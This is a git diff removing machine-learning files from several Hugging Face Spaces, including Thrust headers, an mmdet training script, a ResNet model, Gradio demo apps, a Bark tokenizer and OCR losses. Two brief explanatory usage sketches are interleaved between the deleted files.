-template<typename DerivedPolicy, typename InputIterator1, typename InputIterator2, typename OutputIterator, typename Predicate, typename T>
-__host__ __device__
-  OutputIterator replace_copy_if(thrust::execution_policy<DerivedPolicy> &exec,
- InputIterator1 first,
- InputIterator1 last,
- InputIterator2 stencil,
- OutputIterator result,
- Predicate pred,
- const T &new_value);
-
-
-template<typename DerivedPolicy, typename InputIterator, typename OutputIterator, typename T>
-__host__ __device__
-  OutputIterator replace_copy(thrust::execution_policy<DerivedPolicy> &exec,
- InputIterator first,
- InputIterator last,
- OutputIterator result,
- const T &old_value,
- const T &new_value);
-
-
-template<typename DerivedPolicy, typename ForwardIterator, typename Predicate, typename T>
-__host__ __device__
-  void replace_if(thrust::execution_policy<DerivedPolicy> &exec,
- ForwardIterator first,
- ForwardIterator last,
- Predicate pred,
- const T &new_value);
-
-
-template<typename DerivedPolicy, typename ForwardIterator, typename InputIterator, typename Predicate, typename T>
-__host__ __device__
-  void replace_if(thrust::execution_policy<DerivedPolicy> &exec,
- ForwardIterator first,
- ForwardIterator last,
- InputIterator stencil,
- Predicate pred,
- const T &new_value);
-
-
-template<typename DerivedPolicy, typename ForwardIterator, typename T>
-__host__ __device__
-  void replace(thrust::execution_policy<DerivedPolicy> &exec,
- ForwardIterator first,
- ForwardIterator last,
- const T &old_value,
- const T &new_value);
-
-
-} // end namespace generic
-} // end namespace detail
-} // end namespace system
-} // end namespace thrust
-
-#include <thrust/system/detail/generic/replace.inl>
-
diff --git a/spaces/CVPR/LIVE/thrust/thrust/system/tbb/detail/find.h b/spaces/CVPR/LIVE/thrust/thrust/system/tbb/detail/find.h
deleted file mode 100644
index e07d322a87c2494a4eba62e92447b7b970112eb4..0000000000000000000000000000000000000000
--- a/spaces/CVPR/LIVE/thrust/thrust/system/tbb/detail/find.h
+++ /dev/null
@@ -1,46 +0,0 @@
-/*
- * Copyright 2008-2013 NVIDIA Corporation
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-
-#pragma once
-
-#include <thrust/detail/config.h>
-#include <thrust/system/tbb/detail/execution_policy.h>
-#include <thrust/system/detail/generic/find.h>
-
-namespace thrust
-{
-namespace system
-{
-namespace tbb
-{
-namespace detail
-{
-
-template<typename DerivedPolicy, typename InputIterator, typename Predicate>
-InputIterator find_if(execution_policy<DerivedPolicy> &exec,
- InputIterator first,
- InputIterator last,
- Predicate pred)
-{
- // tbb prefers generic::find_if to cpp::find_if
- return thrust::system::detail::generic::find_if(exec, first, last, pred);
-}
-
-} // end namespace detail
-} // end namespace tbb
-} // end namespace system
-} // end namespace thrust
-
diff --git a/spaces/CVPR/WALT/walt/apis/train.py b/spaces/CVPR/WALT/walt/apis/train.py
deleted file mode 100644
index 6c8003d5fdf20a3d6a04ab4a031b053cf56d49c7..0000000000000000000000000000000000000000
--- a/spaces/CVPR/WALT/walt/apis/train.py
+++ /dev/null
@@ -1,187 +0,0 @@
-import random
-import warnings
-
-import numpy as np
-import torch
-from mmcv.parallel import MMDataParallel, MMDistributedDataParallel
-from mmcv.runner import (HOOKS, DistSamplerSeedHook, EpochBasedRunner,
- Fp16OptimizerHook, OptimizerHook, build_optimizer,
- build_runner)
-from mmcv.utils import build_from_cfg
-
-from mmdet.core import DistEvalHook, EvalHook
-from walt.datasets import (build_dataloader, build_dataset,
- replace_ImageToTensor)
-from mmdet.utils import get_root_logger
-from mmcv_custom.runner import EpochBasedRunnerAmp
-try:
- import apex
-except:
- print('apex is not installed')
-
-
-def set_random_seed(seed, deterministic=False):
- """Set random seed.
-
- Args:
- seed (int): Seed to be used.
- deterministic (bool): Whether to set the deterministic option for
- CUDNN backend, i.e., set `torch.backends.cudnn.deterministic`
- to True and `torch.backends.cudnn.benchmark` to False.
- Default: False.
- """
- random.seed(seed)
- np.random.seed(seed)
- torch.manual_seed(seed)
- torch.cuda.manual_seed_all(seed)
- if deterministic:
- torch.backends.cudnn.deterministic = True
- torch.backends.cudnn.benchmark = False
-
-
-def train_detector(model,
- dataset,
- cfg,
- distributed=False,
- validate=False,
- timestamp=None,
- meta=None):
- logger = get_root_logger(cfg.log_level)
-
- # prepare data loaders
- dataset = dataset if isinstance(dataset, (list, tuple)) else [dataset]
- if 'imgs_per_gpu' in cfg.data:
- logger.warning('"imgs_per_gpu" is deprecated in MMDet V2.0. '
- 'Please use "samples_per_gpu" instead')
- if 'samples_per_gpu' in cfg.data:
- logger.warning(
- f'Got "imgs_per_gpu"={cfg.data.imgs_per_gpu} and '
- f'"samples_per_gpu"={cfg.data.samples_per_gpu}, "imgs_per_gpu"'
- f'={cfg.data.imgs_per_gpu} is used in this experiments')
- else:
- logger.warning(
- 'Automatically set "samples_per_gpu"="imgs_per_gpu"='
- f'{cfg.data.imgs_per_gpu} in this experiments')
- cfg.data.samples_per_gpu = cfg.data.imgs_per_gpu
-
- data_loaders = [
- build_dataloader(
- ds,
- cfg.data.samples_per_gpu,
- cfg.data.workers_per_gpu,
- # cfg.gpus will be ignored if distributed
- len(cfg.gpu_ids),
- dist=distributed,
- seed=cfg.seed) for ds in dataset
- ]
-
- # build optimizer
- optimizer = build_optimizer(model, cfg.optimizer)
-
- # use apex fp16 optimizer
- if cfg.optimizer_config.get("type", None) and cfg.optimizer_config["type"] == "DistOptimizerHook":
- if cfg.optimizer_config.get("use_fp16", False):
- model, optimizer = apex.amp.initialize(
- model.cuda(), optimizer, opt_level="O1")
- for m in model.modules():
- if hasattr(m, "fp16_enabled"):
- m.fp16_enabled = True
-
- # put model on gpus
- if distributed:
- find_unused_parameters = cfg.get('find_unused_parameters', False)
- # Sets the `find_unused_parameters` parameter in
- # torch.nn.parallel.DistributedDataParallel
- model = MMDistributedDataParallel(
- model.cuda(),
- device_ids=[torch.cuda.current_device()],
- broadcast_buffers=False,
- find_unused_parameters=find_unused_parameters)
- else:
- model = MMDataParallel(
- model.cuda(cfg.gpu_ids[0]), device_ids=cfg.gpu_ids)
-
- if 'runner' not in cfg:
- cfg.runner = {
- 'type': 'EpochBasedRunner',
- 'max_epochs': cfg.total_epochs
- }
- warnings.warn(
- 'config is now expected to have a `runner` section, '
- 'please set `runner` in your config.', UserWarning)
- else:
- if 'total_epochs' in cfg:
- assert cfg.total_epochs == cfg.runner.max_epochs
-
- # build runner
- runner = build_runner(
- cfg.runner,
- default_args=dict(
- model=model,
- optimizer=optimizer,
- work_dir=cfg.work_dir,
- logger=logger,
- meta=meta))
-
- # an ugly workaround to make .log and .log.json filenames the same
- runner.timestamp = timestamp
-
- # fp16 setting
- fp16_cfg = cfg.get('fp16', None)
- if fp16_cfg is not None:
- optimizer_config = Fp16OptimizerHook(
- **cfg.optimizer_config, **fp16_cfg, distributed=distributed)
- elif distributed and 'type' not in cfg.optimizer_config:
- optimizer_config = OptimizerHook(**cfg.optimizer_config)
- else:
- optimizer_config = cfg.optimizer_config
-
- # register hooks
- runner.register_training_hooks(cfg.lr_config, optimizer_config,
- cfg.checkpoint_config, cfg.log_config,
- cfg.get('momentum_config', None))
- if distributed:
- if isinstance(runner, EpochBasedRunner):
- runner.register_hook(DistSamplerSeedHook())
-
- # register eval hooks
- if validate:
- # Support batch_size > 1 in validation
- val_samples_per_gpu = cfg.data.val.pop('samples_per_gpu', 1)
- if val_samples_per_gpu > 1:
- # Replace 'ImageToTensor' to 'DefaultFormatBundle'
- cfg.data.val.pipeline = replace_ImageToTensor(
- cfg.data.val.pipeline)
- val_dataset = build_dataset(cfg.data.val, dict(test_mode=True))
- val_dataloader = build_dataloader(
- val_dataset,
- samples_per_gpu=val_samples_per_gpu,
- workers_per_gpu=cfg.data.workers_per_gpu,
- dist=distributed,
- shuffle=False)
- eval_cfg = cfg.get('evaluation', {})
- eval_cfg['by_epoch'] = cfg.runner['type'] != 'IterBasedRunner'
- eval_hook = DistEvalHook if distributed else EvalHook
- runner.register_hook(eval_hook(val_dataloader, **eval_cfg))
- '''
- '''
-
- # user-defined hooks
- if cfg.get('custom_hooks', None):
- custom_hooks = cfg.custom_hooks
- assert isinstance(custom_hooks, list), \
- f'custom_hooks expect list type, but got {type(custom_hooks)}'
- for hook_cfg in cfg.custom_hooks:
- assert isinstance(hook_cfg, dict), \
- 'Each item in custom_hooks expects dict type, but got ' \
- f'{type(hook_cfg)}'
- hook_cfg = hook_cfg.copy()
- priority = hook_cfg.pop('priority', 'NORMAL')
- hook = build_from_cfg(hook_cfg, HOOKS)
- runner.register_hook(hook, priority=priority)
-
- if cfg.resume_from:
- runner.resume(cfg.resume_from)
- elif cfg.load_from:
- runner.load_checkpoint(cfg.load_from)
- runner.run(data_loaders, cfg.workflow)
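For reference, the seed-setting helper at the top of the deleted train.py above is useful on its own. Below is a minimal, self-contained sketch of the same logic (only torch and numpy required), independent of the rest of the mmcv/mmdet training pipeline; it mirrors the function shown above rather than importing the heavy module.

```python
# Standalone sketch mirroring set_random_seed() from the deleted train.py above;
# only random, numpy, and torch are needed here.
import random

import numpy as np
import torch


def set_random_seed(seed: int, deterministic: bool = False) -> None:
    """Seed every RNG source used during training."""
    random.seed(seed)
    np.random.seed(seed)
    torch.manual_seed(seed)
    torch.cuda.manual_seed_all(seed)  # no-op on CPU-only machines
    if deterministic:
        # Trades cuDNN autotuning speed for bit-exact reproducibility.
        torch.backends.cudnn.deterministic = True
        torch.backends.cudnn.benchmark = False


set_random_seed(42, deterministic=True)
```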
diff --git a/spaces/CVPR/lama-example/models/ade20k/resnet.py b/spaces/CVPR/lama-example/models/ade20k/resnet.py
deleted file mode 100644
index 3e1d521f171c984cf6a7ff3dcebd96f8c5faf908..0000000000000000000000000000000000000000
--- a/spaces/CVPR/lama-example/models/ade20k/resnet.py
+++ /dev/null
@@ -1,181 +0,0 @@
-"""Modified from https://github.com/CSAILVision/semantic-segmentation-pytorch"""
-
-import math
-
-import torch.nn as nn
-from torch.nn import BatchNorm2d
-
-from .utils import load_url
-
-__all__ = ['ResNet', 'resnet50']
-
-
-model_urls = {
- 'resnet50': 'http://sceneparsing.csail.mit.edu/model/pretrained_resnet/resnet50-imagenet.pth',
-}
-
-
-def conv3x3(in_planes, out_planes, stride=1):
- "3x3 convolution with padding"
- return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
- padding=1, bias=False)
-
-
-class BasicBlock(nn.Module):
- expansion = 1
-
- def __init__(self, inplanes, planes, stride=1, downsample=None):
- super(BasicBlock, self).__init__()
- self.conv1 = conv3x3(inplanes, planes, stride)
- self.bn1 = BatchNorm2d(planes)
- self.relu = nn.ReLU(inplace=True)
- self.conv2 = conv3x3(planes, planes)
- self.bn2 = BatchNorm2d(planes)
- self.downsample = downsample
- self.stride = stride
-
- def forward(self, x):
- residual = x
-
- out = self.conv1(x)
- out = self.bn1(out)
- out = self.relu(out)
-
- out = self.conv2(out)
- out = self.bn2(out)
-
- if self.downsample is not None:
- residual = self.downsample(x)
-
- out += residual
- out = self.relu(out)
-
- return out
-
-
-class Bottleneck(nn.Module):
- expansion = 4
-
- def __init__(self, inplanes, planes, stride=1, downsample=None):
- super(Bottleneck, self).__init__()
- self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
- self.bn1 = BatchNorm2d(planes)
- self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
- padding=1, bias=False)
- self.bn2 = BatchNorm2d(planes)
- self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
- self.bn3 = BatchNorm2d(planes * 4)
- self.relu = nn.ReLU(inplace=True)
- self.downsample = downsample
- self.stride = stride
-
- def forward(self, x):
- residual = x
-
- out = self.conv1(x)
- out = self.bn1(out)
- out = self.relu(out)
-
- out = self.conv2(out)
- out = self.bn2(out)
- out = self.relu(out)
-
- out = self.conv3(out)
- out = self.bn3(out)
-
- if self.downsample is not None:
- residual = self.downsample(x)
-
- out += residual
- out = self.relu(out)
-
- return out
-
-
-class ResNet(nn.Module):
-
- def __init__(self, block, layers, num_classes=1000):
- self.inplanes = 128
- super(ResNet, self).__init__()
- self.conv1 = conv3x3(3, 64, stride=2)
- self.bn1 = BatchNorm2d(64)
- self.relu1 = nn.ReLU(inplace=True)
- self.conv2 = conv3x3(64, 64)
- self.bn2 = BatchNorm2d(64)
- self.relu2 = nn.ReLU(inplace=True)
- self.conv3 = conv3x3(64, 128)
- self.bn3 = BatchNorm2d(128)
- self.relu3 = nn.ReLU(inplace=True)
- self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
-
- self.layer1 = self._make_layer(block, 64, layers[0])
- self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
- self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
- self.layer4 = self._make_layer(block, 512, layers[3], stride=2)
- self.avgpool = nn.AvgPool2d(7, stride=1)
- self.fc = nn.Linear(512 * block.expansion, num_classes)
-
- for m in self.modules():
- if isinstance(m, nn.Conv2d):
- n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
- m.weight.data.normal_(0, math.sqrt(2. / n))
- elif isinstance(m, BatchNorm2d):
- m.weight.data.fill_(1)
- m.bias.data.zero_()
-
- def _make_layer(self, block, planes, blocks, stride=1):
- downsample = None
- if stride != 1 or self.inplanes != planes * block.expansion:
- downsample = nn.Sequential(
- nn.Conv2d(self.inplanes, planes * block.expansion,
- kernel_size=1, stride=stride, bias=False),
- BatchNorm2d(planes * block.expansion),
- )
-
- layers = []
- layers.append(block(self.inplanes, planes, stride, downsample))
- self.inplanes = planes * block.expansion
- for i in range(1, blocks):
- layers.append(block(self.inplanes, planes))
-
- return nn.Sequential(*layers)
-
- def forward(self, x):
- x = self.relu1(self.bn1(self.conv1(x)))
- x = self.relu2(self.bn2(self.conv2(x)))
- x = self.relu3(self.bn3(self.conv3(x)))
- x = self.maxpool(x)
-
- x = self.layer1(x)
- x = self.layer2(x)
- x = self.layer3(x)
- x = self.layer4(x)
-
- x = self.avgpool(x)
- x = x.view(x.size(0), -1)
- x = self.fc(x)
-
- return x
-
-
-def resnet50(pretrained=False, **kwargs):
- """Constructs a ResNet-50 model.
-
- Args:
- pretrained (bool): If True, returns a model pre-trained on ImageNet
- """
- model = ResNet(Bottleneck, [3, 4, 6, 3], **kwargs)
- if pretrained:
- model.load_state_dict(load_url(model_urls['resnet50']), strict=False)
- return model
-
-
-def resnet18(pretrained=False, **kwargs):
- """Constructs a ResNet-18 model.
- Args:
- pretrained (bool): If True, returns a model pre-trained on ImageNet
- """
- model = ResNet(BasicBlock, [2, 2, 2, 2], **kwargs)
- if pretrained:
- model.load_state_dict(load_url(model_urls['resnet18']))
- return model
\ No newline at end of file
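The ResNet definition above (deleted from the lama-example space) can be exercised with a dummy input as a quick sanity check. The sketch below assumes the module is importable as models.ade20k.resnet, as in the deleted space layout, with its sibling utils module present and PyTorch installed; it is not part of the original repository.

```python
# Hedged usage sketch; assumes the deleted module above is importable as
# models.ade20k.resnet (with its sibling utils module available) and torch is installed.
import torch

from models.ade20k.resnet import resnet50  # hypothetical import path

model = resnet50(pretrained=False, num_classes=1000)
model.eval()

# The stride-2 conv stem, max-pool, and the stride-2 layer2/3/4 stages reduce a
# 224x224 input to a 7x7 feature map, matching the fixed 7x7 AvgPool2d before the fc layer.
with torch.no_grad():
    logits = model(torch.randn(1, 3, 224, 224))

print(logits.shape)  # expected: torch.Size([1, 1000])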
diff --git a/spaces/CVPR/monoscene_lite/app.py b/spaces/CVPR/monoscene_lite/app.py
deleted file mode 100644
index b8e3d855500b09da634c5a356fbae9569d514704..0000000000000000000000000000000000000000
--- a/spaces/CVPR/monoscene_lite/app.py
+++ /dev/null
@@ -1,121 +0,0 @@
-import gradio as gr
-import numpy as np
-from torchvision import transforms
-import torch
-from helpers import *
-import sys
-import csv
-from monoscene.monoscene import MonoScene
-
-csv.field_size_limit(sys.maxsize)
-torch.set_grad_enabled(False)
-
-
-model = MonoScene.load_from_checkpoint(
- "monoscene_kitti.ckpt",
- dataset="kitti",
- n_classes=20,
- feature = 64,
- project_scale = 4,
- full_scene_size = (256, 256, 32),
- )
-
-img_W, img_H = 1220, 370
-
-
-def predict(img):
- img = np.array(img, dtype=np.float32, copy=False) / 255.0
-
- normalize_rgb = transforms.Compose(
- [
- transforms.ToTensor(),
- transforms.Normalize(
- mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]
- ),
- ]
- )
- img = normalize_rgb(img)
-
- batch = get_projections(img_W, img_H)
- batch["img"] = img
- for k in batch:
- batch[k] = batch[k].unsqueeze(0)#.cuda()
-
- pred = model(batch).squeeze()
- fig = draw(pred, batch['fov_mask_2'])
-
-
- return fig
-
-
-description = """
-MonoScene Demo on SemanticKITTI Validation Set (Sequence 08), which uses the camera parameters of Sequence 08.
-Due to the CPU-only inference, it might take up to 20s to predict a scene. \n
-This is a smaller model with half resolution and w/o 3D CRP. You can find the full model at: https://huggingface.co/spaces/CVPR/MonoScene
-
-
-
-
-
-
-
-"""
-title = "MonoScene Lite - Half resolution, w/o 3D CRP"
-article="""
-
-
-
-"""
-
-examples = [
- 'images/08/001385.jpg',
- 'images/08/000295.jpg',
- 'images/08/002505.jpg',
- 'images/08/000085.jpg',
- 'images/08/000290.jpg',
- 'images/08/000465.jpg',
- 'images/08/000790.jpg',
- 'images/08/001005.jpg',
- 'images/08/001380.jpg',
- 'images/08/001530.jpg',
- 'images/08/002360.jpg',
- 'images/08/004059.jpg',
- 'images/08/003149.jpg',
- 'images/08/001446.jpg',
- 'images/08/000010.jpg',
- 'images/08/001122.jpg',
- 'images/08/003533.jpg',
- 'images/08/003365.jpg',
- 'images/08/002944.jpg',
- 'images/08/000822.jpg',
- 'images/08/000103.jpg',
- 'images/08/002716.jpg',
- 'images/08/000187.jpg',
- 'images/08/002128.jpg',
- 'images/08/000511.jpg',
- 'images/08/000618.jpg',
- 'images/08/002010.jpg',
- 'images/08/000234.jpg',
- 'images/08/001842.jpg',
- 'images/08/001687.jpg',
- 'images/08/003929.jpg',
- 'images/08/002272.jpg',
-]
-
-
-
-
-demo = gr.Interface(
- predict,
- gr.Image(shape=(1220, 370)),
- gr.Plot(),
- article=article,
- title=title,
- enable_queue=True,
- cache_examples=False,
- live=False,
- examples=examples,
- description=description)
-
-
-demo.launch(enable_queue=True, debug=False)
\ No newline at end of file
diff --git a/spaces/CikeyQI/Yunzai/Yunzai/app.js b/spaces/CikeyQI/Yunzai/Yunzai/app.js
deleted file mode 100644
index 6feed2aa2a5f229da43a369ed249523cfdfe5cfc..0000000000000000000000000000000000000000
--- a/spaces/CikeyQI/Yunzai/Yunzai/app.js
+++ /dev/null
@@ -1,3 +0,0 @@
-import Yunzai from "./lib/bot.js"
-global.Bot = new Yunzai
-Bot.run()
\ No newline at end of file
diff --git a/spaces/Cloudyy/bark-voice-cloning/hubert/customtokenizer.py b/spaces/Cloudyy/bark-voice-cloning/hubert/customtokenizer.py
deleted file mode 100644
index d8f84d90f198ce08b2ed38be714bcde7df3c46b4..0000000000000000000000000000000000000000
--- a/spaces/Cloudyy/bark-voice-cloning/hubert/customtokenizer.py
+++ /dev/null
@@ -1,182 +0,0 @@
-import json
-import os.path
-from zipfile import ZipFile
-
-import numpy
-import torch
-from torch import nn, optim
-from torch.serialization import MAP_LOCATION
-
-
-class CustomTokenizer(nn.Module):
- def __init__(self, hidden_size=1024, input_size=768, output_size=10000, version=0):
- super(CustomTokenizer, self).__init__()
- next_size = input_size
- if version == 0:
- self.lstm = nn.LSTM(input_size, hidden_size, 2, batch_first=True)
- next_size = hidden_size
- if version == 1:
- self.lstm = nn.LSTM(input_size, hidden_size, 2, batch_first=True)
- self.intermediate = nn.Linear(hidden_size, 4096)
- next_size = 4096
-
- self.fc = nn.Linear(next_size, output_size)
- self.softmax = nn.LogSoftmax(dim=1)
- self.optimizer: optim.Optimizer = None
- self.lossfunc = nn.CrossEntropyLoss()
- self.input_size = input_size
- self.hidden_size = hidden_size
- self.output_size = output_size
- self.version = version
-
- def forward(self, x):
- x, _ = self.lstm(x)
- if self.version == 1:
- x = self.intermediate(x)
- x = self.fc(x)
- x = self.softmax(x)
- return x
-
- @torch.no_grad()
- def get_token(self, x):
- """
- Used to get the token for the first
- :param x: An array with shape (N, input_size) where N is a whole number greater or equal to 1, and input_size is the input size used when creating the model.
- :return: An array with shape (N,) where N is the same as N from the input. Every number in the array is a whole number in range 0...output_size - 1 where output_size is the output size used when creating the model.
- """
- return torch.argmax(self(x), dim=1)
-
- def prepare_training(self):
- self.optimizer = optim.Adam(self.parameters(), 0.001)
-
- def train_step(self, x_train, y_train, log_loss=False):
- # y_train = y_train[:-1]
- # y_train = y_train[1:]
-
- optimizer = self.optimizer
- lossfunc = self.lossfunc
- # Zero the gradients
- self.zero_grad()
-
- # Forward pass
- y_pred = self(x_train)
-
- y_train_len = len(y_train)
- y_pred_len = y_pred.shape[0]
-
- if y_train_len > y_pred_len:
- diff = y_train_len - y_pred_len
- y_train = y_train[diff:]
- elif y_train_len < y_pred_len:
- diff = y_pred_len - y_train_len
- y_pred = y_pred[:-diff, :]
-
- y_train_hot = torch.zeros(len(y_train), self.output_size)
- y_train_hot[range(len(y_train)), y_train] = 1
- y_train_hot = y_train_hot.to('cuda')
-
- # Calculate the loss
- loss = lossfunc(y_pred, y_train_hot)
-
- # Print loss
- if log_loss:
- print('Loss', loss.item())
-
- # Backward pass
- loss.backward()
-
- # Update the weights
- optimizer.step()
-
- def save(self, path):
- info_path = os.path.basename(path) + '/.info'
- torch.save(self.state_dict(), path)
- data_from_model = Data(self.input_size, self.hidden_size, self.output_size, self.version)
- with ZipFile(path, 'a') as model_zip:
- model_zip.writestr(info_path, data_from_model.save())
- model_zip.close()
-
- @staticmethod
- def load_from_checkpoint(path, map_location: MAP_LOCATION = None):
- old = True
- with ZipFile(path) as model_zip:
- filesMatch = [file for file in model_zip.namelist() if file.endswith('/.info')]
- file = filesMatch[0] if filesMatch else None
- if file:
- old = False
- data_from_model = Data.load(model_zip.read(file).decode('utf-8'))
- model_zip.close()
- if old:
- model = CustomTokenizer()
- else:
- model = CustomTokenizer(data_from_model.hidden_size, data_from_model.input_size, data_from_model.output_size, data_from_model.version)
- model.load_state_dict(torch.load(path, map_location))
- return model
-
-
-
-class Data:
- input_size: int
- hidden_size: int
- output_size: int
- version: int
-
- def __init__(self, input_size=768, hidden_size=1024, output_size=10000, version=0):
- self.input_size = input_size
- self.hidden_size = hidden_size
- self.output_size = output_size
- self.version = version
-
- @staticmethod
- def load(string):
- data = json.loads(string)
- return Data(data['input_size'], data['hidden_size'], data['output_size'], data['version'])
-
- def save(self):
- data = {
- 'input_size': self.input_size,
- 'hidden_size': self.hidden_size,
- 'output_size': self.output_size,
- 'version': self.version,
- }
- return json.dumps(data)
-
-
-def auto_train(data_path, save_path='model.pth', load_model: str | None = None, save_epochs=1):
- data_x, data_y = [], []
-
- if load_model and os.path.isfile(load_model):
- print('Loading model from', load_model)
- model_training = CustomTokenizer.load_from_checkpoint(load_model, 'cuda')
- else:
- print('Creating new model.')
- model_training = CustomTokenizer(version=1).to('cuda') # Settings for the model to run without lstm
- save_path = os.path.join(data_path, save_path)
- base_save_path = '.'.join(save_path.split('.')[:-1])
-
- sem_string = '_semantic.npy'
- feat_string = '_semantic_features.npy'
-
- ready = os.path.join(data_path, 'ready')
- for input_file in os.listdir(ready):
- full_path = os.path.join(ready, input_file)
- if input_file.endswith(sem_string):
- data_y.append(numpy.load(full_path))
- elif input_file.endswith(feat_string):
- data_x.append(numpy.load(full_path))
- model_training.prepare_training()
-
- epoch = 1
-
- while 1:
- for i in range(save_epochs):
- j = 0
- for x, y in zip(data_x, data_y):
- model_training.train_step(torch.tensor(x).to('cuda'), torch.tensor(y).to('cuda'), j % 50 == 0) # Print loss every 50 steps
- j += 1
- save_p = save_path
- save_p_2 = f'{base_save_path}_epoch_{epoch}.pth'
- model_training.save(save_p)
- model_training.save(save_p_2)
- print(f'Epoch {epoch} completed')
- epoch += 1
diff --git a/spaces/Cyril666/my_abi/losses.py b/spaces/Cyril666/my_abi/losses.py
deleted file mode 100644
index 1b718a9ce2dd125ccd2c45f112fb278a299f4a99..0000000000000000000000000000000000000000
--- a/spaces/Cyril666/my_abi/losses.py
+++ /dev/null
@@ -1,72 +0,0 @@
-from fastai.vision import *
-
-from modules.model import Model
-
-
-class MultiLosses(nn.Module):
- def __init__(self, one_hot=True):
- super().__init__()
- self.ce = SoftCrossEntropyLoss() if one_hot else torch.nn.CrossEntropyLoss()
- self.bce = torch.nn.BCELoss()
-
- @property
- def last_losses(self):
- return self.losses
-
- def _flatten(self, sources, lengths):
- return torch.cat([t[:l] for t, l in zip(sources, lengths)])
-
- def _merge_list(self, all_res):
- if not isinstance(all_res, (list, tuple)):
- return all_res
- def merge(items):
- if isinstance(items[0], torch.Tensor): return torch.cat(items, dim=0)
- else: return items[0]
- res = dict()
- for key in all_res[0].keys():
- items = [r[key] for r in all_res]
- res[key] = merge(items)
- return res
-
- def _ce_loss(self, output, gt_labels, gt_lengths, idx=None, record=True):
- loss_name = output.get('name')
- pt_logits, weight = output['logits'], output['loss_weight']
-
- assert pt_logits.shape[0] % gt_labels.shape[0] == 0
- iter_size = pt_logits.shape[0] // gt_labels.shape[0]
- if iter_size > 1:
- gt_labels = gt_labels.repeat(3, 1, 1)
- gt_lengths = gt_lengths.repeat(3)
- flat_gt_labels = self._flatten(gt_labels, gt_lengths)
- flat_pt_logits = self._flatten(pt_logits, gt_lengths)
-
- nll = output.get('nll')
- if nll is not None:
- loss = self.ce(flat_pt_logits, flat_gt_labels, softmax=False) * weight
- else:
- loss = self.ce(flat_pt_logits, flat_gt_labels) * weight
- if record and loss_name is not None: self.losses[f'{loss_name}_loss'] = loss
-
- return loss
-
- def forward(self, outputs, *args):
- self.losses = {}
- if isinstance(outputs, (tuple, list)):
- outputs = [self._merge_list(o) for o in outputs]
- return sum([self._ce_loss(o, *args) for o in outputs if o['loss_weight'] > 0.])
- else:
- return self._ce_loss(outputs, *args, record=False)
-
-
-class SoftCrossEntropyLoss(nn.Module):
- def __init__(self, reduction="mean"):
- super().__init__()
- self.reduction = reduction
-
- def forward(self, input, target, softmax=True):
- if softmax: log_prob = F.log_softmax(input, dim=-1)
- else: log_prob = torch.log(input)
- loss = -(target * log_prob).sum(dim=-1)
- if self.reduction == "mean": return loss.mean()
- elif self.reduction == "sum": return loss.sum()
- else: return loss
diff --git a/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/gradio/blocks.py b/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/gradio/blocks.py
deleted file mode 100644
index f441d39d9b981b26dc711942b79b1ca73d71e6ad..0000000000000000000000000000000000000000
--- a/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/gradio/blocks.py
+++ /dev/null
@@ -1,2175 +0,0 @@
-from __future__ import annotations
-
-import copy
-import inspect
-import json
-import os
-import random
-import secrets
-import sys
-import threading
-import time
-import warnings
-import webbrowser
-from abc import abstractmethod
-from pathlib import Path
-from types import ModuleType
-from typing import TYPE_CHECKING, Any, AsyncIterator, Callable, Literal, cast
-
-import anyio
-import requests
-from anyio import CapacityLimiter
-from gradio_client import serializing
-from gradio_client import utils as client_utils
-from gradio_client.documentation import document, set_documentation_group
-from packaging import version
-
-from gradio import (
- analytics,
- components,
- external,
- networking,
- queueing,
- routes,
- strings,
- themes,
- utils,
- wasm_utils,
-)
-from gradio.context import Context
-from gradio.deprecation import check_deprecated_parameters, warn_deprecation
-from gradio.exceptions import (
- DuplicateBlockError,
- InvalidApiNameError,
- InvalidBlockError,
-)
-from gradio.helpers import EventData, create_tracker, skip, special_args
-from gradio.themes import Default as DefaultTheme
-from gradio.themes import ThemeClass as Theme
-from gradio.tunneling import (
- BINARY_FILENAME,
- BINARY_FOLDER,
- BINARY_PATH,
- BINARY_URL,
- CURRENT_TUNNELS,
-)
-from gradio.utils import (
- GRADIO_VERSION,
- TupleNoPrint,
- check_function_inputs_match,
- component_or_layout_class,
- delete_none,
- get_cancel_function,
- get_continuous_fn,
-)
-
-try:
- import spaces # type: ignore
-except Exception:
- spaces = None
-
-set_documentation_group("blocks")
-
-if TYPE_CHECKING: # Only import for type checking (is False at runtime).
- from fastapi.applications import FastAPI
-
- from gradio.components import Component
-
-BUILT_IN_THEMES: dict[str, Theme] = {
- t.name: t
- for t in [
- themes.Base(),
- themes.Default(),
- themes.Monochrome(),
- themes.Soft(),
- themes.Glass(),
- ]
-}
-
-
-class Block:
- def __init__(
- self,
- *,
- render: bool = True,
- elem_id: str | None = None,
- elem_classes: list[str] | str | None = None,
- visible: bool = True,
- root_url: str | None = None, # URL that is prepended to all file paths
- _skip_init_processing: bool = False, # Used for loading from Spaces
- **kwargs,
- ):
- self._id = Context.id
- Context.id += 1
- self.visible = visible
- self.elem_id = elem_id
- self.elem_classes = (
- [elem_classes] if isinstance(elem_classes, str) else elem_classes
- )
- self.root_url = root_url
- self.share_token = secrets.token_urlsafe(32)
- self._skip_init_processing = _skip_init_processing
- self.parent: BlockContext | None = None
-
- if render:
- self.render()
- check_deprecated_parameters(self.__class__.__name__, kwargs=kwargs)
-
- def render(self):
- """
- Adds self into appropriate BlockContext
- """
- if Context.root_block is not None and self._id in Context.root_block.blocks:
- raise DuplicateBlockError(
- f"A block with id: {self._id} has already been rendered in the current Blocks."
- )
- if Context.block is not None:
- Context.block.add(self)
- if Context.root_block is not None:
- Context.root_block.blocks[self._id] = self
